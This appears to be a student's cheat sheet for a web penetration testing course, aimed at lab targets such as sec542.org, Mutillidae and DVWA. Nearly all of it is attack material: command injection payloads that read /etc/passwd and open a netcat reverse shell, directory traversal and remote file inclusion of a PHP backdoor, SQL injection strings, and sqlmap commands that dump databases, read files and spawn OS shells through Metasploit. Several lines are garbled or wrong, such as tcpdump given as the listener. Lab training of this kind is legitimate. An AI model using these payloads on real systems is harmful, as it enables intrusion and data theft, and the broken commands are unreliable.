## Authentication bypass on BASE (3.30) #build out this exploit.html file
## COMMAND INJECTION # find vulnerable form or URL sec542.org search; cat /etc/passwd ## the semi-colon ends first statement and executes second # silently test with ping sec542.org search; ping -c3 127.0.0.1 ## ping 3x, have tcpdump running # have a reverse backdoor shell connect to our NC sec542.org search; nc 127.0.0.1 1337 -e /bin/bash ## -e execute cmd which is a shell ## TCPDUMP for inject sudo tcpdump -ni any icmp[icmptype]=icmo-echo ## -n dont resolve names. -i any interface. filtering on icmp only ## Netcat listener for reverse backdoor tcpdump -lvvnp 1337 ## -l listen. -vv very verbose. -n no dns resolve. -p port ## DIRECTORY TRAVERSAL http://sec542.org/scripts/../../winnt/system32/cmd.exe+/c+dir sec542.org/scripts/../../etc/passwd%00 ## Adding %00 can act as NULL which ends syntax mutillidae/index.php?page=/etc/passwd ## Quick PHP Shell, still have to upload to target. replace command with an actual command ex: id '); ?> OR as a single line echo shell_exec(''); ?> ## Backdoor PHP as shell.txt ## Run backdoor through another device http://example.org/index.php?page=http://127.0.0.1/shell.txt then nc 127.0.0.1 4242 ## SQL INJECTION syntax. cheatsheets Dent ' '*' Dent' OR '1'='1 Dent' OR 1=1;# ## semi-colo ends sql statement and # is comments out remaining sql in backend ## SQLI Identify columns Dent' ORDER BY 1;# ## Keep repeating until you get an error, this gives you number of columns in table Dent' ORDER BY 2;# ## SQLI Query Dent' UNION SELECT '1','2','3','4';# Dent' UNION SELECT '1','2','3','4', info FROM information_schema.processlist;# ## SQLMAP sqlmap -u http://www.sec542.org/scanners/sqli.php?name=Zaphod --file-read=/etc/passwd sqlmap -u http://www.sec542.org/ --crawl # crawls site looking for entry points sqlmap -u http://www.sec542.org/ --forms # targets web forms sqlmap --proxy # ride with ZAP/Burp. (3.159) sqlmap -u http://www.sec542.org/scanners/sqli.php?name=Zaphod --dump-all # DUMP IT sqlmap -u http://www.sec542.org/scanners/sqli.php?name=Zaphod --search password --tables --users # show DB user accounts --passwords # show passwords --priv-esc # escalate privs --os-cmd --os-shell --os-pwn #metasploit sqlmap -u "http://dvwa/vuln/sqli/id?=1&Submit=Submit" --cookie="23423x" --proxy http://localhost:8081 --batch --user-agent mozilla # Count customers column in sqli database syntax: sqlmap -u "http://dvwa/vuln/sqli/id?=1&Submit=Submit" --cookie="23423x" --proxy http://localhost:8081 --batch --user-agent mozilla -D sqli -T Customers --Count # READ A FILE sqlmap -u "http://dvwa/vuln/sqli/id?=1&Submit=Submit" --cookie="23423x" --proxy http://localhost:8081 --batch --user-agent mozilla --file-read /etc/passwd # Search sqlmap -u "http://dvwa/vuln/sqli/id?=1&Submit=Submit" --cookie="23423x" --proxy http://localhost:8081 --batch --user-agent mozilla --search -d wiki -C pass # METASPLOIT sqlmap -u "http://dvwa/vuln/sqli/id?=1&Submit=Submit" --cookie="23423x" --proxy http://localhost:8081 --batch --user-agent mozilla --os-pwn --msf-path /opt/metasploit-framework